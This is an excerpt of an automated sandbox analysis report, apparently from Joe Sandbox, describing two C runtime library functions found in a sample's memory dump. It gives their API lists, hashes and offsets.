                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                        • Instruction ID: eeecd272dc7f1659d07401e6ae625f5a9d49c751a0f99f8dd4ede65e68feba9a
                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                        • Instruction Fuzzy Hash: C2014C3280414EFBCF1A5E84DC05CEE3F63BB19354B49A415FA99594B0D33AC5B1EB81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E87A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 05E87A4B
                                                                                                                                          • Part of subcall function 05E88140: ___BuildCatchObjectHelper.LIBCMT ref: 05E88172
                                                                                                                                          • Part of subcall function 05E88140: ___AdjustPointer.LIBCMT ref: 05E88189
                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 05E87A62
                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 05E87A74
                                                                                                                                        • CallCatchBlock.LIBCMT ref: 05E87A98
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                        • Instruction ID: 282413c0750823a0b773d594a97c1f551ced1294ea25dc1f5ae5cf69cd149e26
                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                        • Instruction Fuzzy Hash: 11010532500109BBDF12AF95CC04EEA7BAAFF48758F149054FD9C65120D732E9A1DBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%